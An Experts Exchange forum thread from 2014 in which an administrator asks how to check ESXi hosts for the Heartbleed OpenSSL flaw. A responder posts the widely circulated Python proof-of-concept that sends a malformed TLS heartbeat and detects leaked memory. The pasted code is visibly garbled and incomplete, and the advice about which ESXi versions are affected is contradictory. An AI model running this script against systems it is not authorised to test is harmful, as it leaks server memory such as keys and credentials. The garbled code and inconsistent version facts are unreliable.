A Script to Determine OpenSSL version on ESXi Host

Posted on 2014-04-09
Last Modified: 2014-04-16
I need to write a script that basically run thru each ESX host and determine what version of OpenSSL is running and report back which, if any, are vulnerable.

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable

Those any such script that is similar already exist?


Question by:lipotech
  • 7
  • 5
LVL 119
ID: 39990321
see this thread, will answer your question, you just need to check VMware ESXi BUILDs

a test script is included...

prior to ESXi 5.5 should be unaffected.

VMware response...

Author Comment

ID: 39998893

Sorry for the delayed response.  I have been involved in other support activities over the weekend.  I followed the thread as you recommended.  I reviewed the script and I have a series of questions:

1.  Is this a PowerCli?
2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.
3. Would the script be saved as a text file and launched from within PowerShell from the command line?

That you for your support.

LVL 119
ID: 39998914
1.  Is this a PowerCli?


It's not PowerCLI.

Are all your hosts 5.5, if they are 5.5, they have the issue.

If they are lower than 5.1, they do not have this issue.

It's that simple, the details in the forum, are a simple openssl.exe connection call.

2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.

It's run from the command prompt, in the Openssl folder, against the IP Address, of a suspect system (vCenter Server or Host)

3. Would the script be saved as a text file and launched from within PowerShell from the command line?

It's not a script, it's just a command line function.

Personally, I would not waste your time, check your Host versions > 5.1 you have the threat, and you will need to wait for the VMware patch.

< 5.1 no threat exists!
Netscaler Common Configuration How To guides

If you use NetScaler you will want to see these guides. The NetScaler How To Guides show administrators how to get NetScaler up and configured by providing instructions for common scenarios and some not so common ones.

LVL 119
ID: 39999136
if you really want a script, here is a python script

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01

hb = h2bin('''
18 03 02 00 03
01 40 00

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e =[s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    print 'Waiting for Server Hello...'
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:

    print 'Sending heartbeat request...'

if __name__ == '__main__':


Open in new window


Author Comment

ID: 39999225

Thank you.  I or two more final questions.  Is the Pytjon script luanched fromt the ESX host OpenSSl folders as well?  Can I launch the script as is by saving it to a text file?  What extention would I use on the file?  Do I point this file at the IP address as well?

LVL 119
ID: 39999339
You will need to use the Python script on any computer which has Python installed, this is NOT ESXi!

OpenSSL is not required, just Python.

Save the above to a file called <> execute permissions, and run from Linux or Windows.

you type

./ <IP Address?

it will return:-

WARNING: server returned more data than it should - server is vulnerable!

Author Comment

ID: 40003896

I can install Python and use this script.  I would prefer to run a PowerCLI script in this environment.  If there is PowerCLI script that exist, please let me know.  

Otherwise, thank you for providing a complete response to my question.

LVL 119

Accepted Solution

Andrew Hancock (VMware vExpert / EE MVE^2) earned 500 total points
ID: 40003942
I've not seen a PowerCLI script at present.

Wait until 19th April 2014, there will be a patch and update released!

You could use PowerCLI to run the following command...

~ # openssl version
OpenSSL 1.0.1e 11 Feb 2013
~ # vmware --version
VMware ESXi 5.5.0 build-1623387

if version = 1.1.0e you have the bug, it's not a test, but only ESXi 5.5 has the issue!

Author Comment

ID: 40004141
Thank you.
LVL 119
ID: 40004160
no problems

Author Comment

ID: 40004193
If you know of any PowerCli scripts of any type that would be easy follow and test, it would be appreciated.  I am in the process of trying to become more proficient with the PowerCLI scripting language.
LVL 119
ID: 40004281
See my response to your recent posting.

Featured Post

Manage your data center from practically anywhere

The KN8164V features HD resolution of 1920 x 1200, FIPS 140-2 with level 1 security standards and virtual media transmissions at twice the speed. Built for reliability, the KN series provides local console and remote over IP access, ensuring 24/7 availability to all servers.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article will show you how to create an ISO CD-ROM/DVD-ROM image (*.iso), and MD5 checksum signature, for use with VMware vSphere Hypervisor 6.5 (ESXi 6.5). It's a good idea to compare checksums, because many installations fail because of a corr…
Today, the web development industry is booming, and many people consider it to be their vocation. The question you may be asking yourself is – how do I become a web developer?
Teach the user how to join ESXi hosts to Active Directory domains Open vSphere Client: Join ESXi host to AD domain: Verify ESXi computer account in AD: Configure permissions for domain user in ESXi: Test domain user login to ESXi host:
This tutorial will walk an individual through the steps necessary to enable the VMware\Hyper-V licensed feature of Backup Exec 2012. In addition, how to add a VMware server and configure a backup job. The first step is to acquire the necessary licen…

830 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question